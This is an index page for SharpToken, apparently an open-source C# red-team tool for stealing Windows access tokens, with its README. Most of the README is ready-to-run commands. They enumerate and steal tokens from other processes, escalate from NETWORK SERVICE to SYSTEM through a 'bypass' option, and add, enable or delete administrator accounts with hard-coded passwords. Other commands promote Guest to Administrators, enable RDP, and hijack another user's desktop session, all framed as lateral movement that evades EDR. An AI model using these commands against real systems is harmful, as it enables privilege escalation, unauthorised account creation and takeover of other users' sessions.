Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/BeichenDream/SharpToken
Windows Token Stealing Expert
https://github.com/BeichenDream/SharpToken
incognito
Last synced: 21 days ago
JSON representation
Windows Token Stealing Expert
- Host: GitHub
- URL: https://github.com/BeichenDream/SharpToken
- Owner: BeichenDream
- License: gpl-3.0
- Created: 2022-06-30T07:34:57.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2023-11-24T19:21:57.000Z (about 1 year ago)
- Last Synced: 2024-11-15T00:36:29.802Z (27 days ago)
- Topics: incognito
- Language: C#
- Homepage:
- Size: 117 KB
- Stars: 449
- Watchers: 5
- Forks: 63
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - BeichenDream/SharpToken - Windows Token Stealing Expert (C# #)
README
# SharpToken
During red team lateral movement, we often need to steal the permissions of other users. Under the defense of modern EDR, it is difficult for us to use Mimikatz to obtain other user permissions, and if the target user has no process alive, we have no way to use "OpenProcessToken" to steal Token.
SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. If you are a low-privileged service user, you can even use it to upgrade to "NT AUTHORITY\SYSTEM" privileges, and you can switch to the target user's desktop to do more without the target user's password. ..
![image](https://user-images.githubusercontent.com/43266206/188081018-8717b066-1143-48b8-b62b-31360316cce1.png)
## Usage
```
SharpToken By BeichenDream
=========================================================Github : https://github.com/BeichenDream/SharpToken
If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
e.g.
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypassUsage:
SharpToken COMMAND arguments
COMMANDS:
list_token [process pid] [bypass]
list_all_token [process pid] [bypass]
add_user [group] [domain] [bypass]
enableUser [NewGroup] [bypass]
delete_user [domain] [bypass]
execute [Interactive] [bypass]
enableRDP [bypass]
tscon [sourceSessionId] [bypass]
example:
SharpToken list_token
SharpToken list_token bypass
SharpToken list_token 6543
SharpToken add_user admin Abcd1234! Administrators
SharpToken enableUser Guest Abcd1234! Administrators
SharpToken delete_user admin
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
SharpToken tscon 1```
## Elevated Permissions
In addition to the usual Token stealing privilege enhancement, SharpToken also supports obtaining Tokens with integrity through Bypass
If you are an NT AUTHORITY/NETWORK SERVICE user and you add the bypass parameter, SharpToken will steal System from RPCSS, that is, unconditional NT AUTHORITY\NETWORK SERVICE to NT AUTHORITY\SYSTEM
![image](https://user-images.githubusercontent.com/43266206/205461409-0b17af46-00f5-4d68-9a16-a2edd76e67ab.png)
## ListToken
Enumerated information includes SID, LogonDomain, UserName, Session, LogonType, TokenType, TokenHandle (handle of Token after Duplicate), TargetProcessId (process from which Token originates), TargetProcessToken (handle of Token in source process), Groups (group in which Token user is located)
```
SharpToken list_token
```![image](https://user-images.githubusercontent.com/43266206/176751244-dd8f8899-59ec-48e5-9bee-464c0e146573.png)
## Enumerate Tokens from the specified process
```
SharpToken list_token 468
```![image](https://user-images.githubusercontent.com/43266206/176753494-3c6df1cb-5d14-4b36-aa61-ca68a8c38009.png)
## Get an interactive shell
```
execute "NT AUTHORITY\SYSTEM" cmd true
```![image](https://user-images.githubusercontent.com/43266206/176751714-c7edb21c-f0be-4794-a14f-be4a7b1fdf61.png)
## Get command execution results (executed under webshell)
```
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
```![image](https://user-images.githubusercontent.com/43266206/176751980-dd9413f4-1a4d-4cb0-8ba2-5e0b9ccb2eed.png)
## Create an admin user with the stolen token
```
SharpToken add_user admin Abcd1234! Administrators
```
## Enable an admin user with the stolen token
```
SharpToken enableUser Guest Abcd1234! Administrators
```## Delete a user with a stolen Token
```
SharpToken delete_user admin
```## Use the stolen Token to switch to the target's desktop
Where 1 is the target user's desktop and 2 is the desktop we want to receive
```
SharpToken tscon 1 2
```# LICENSE
[GNU General Public License](/LICENSE)
# Reference
https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html
https://github.com/decoder-it/NetworkServiceExploit
https://github.com/FSecureLABS/incognito
https://github.com/chroblert/JCTokenUtil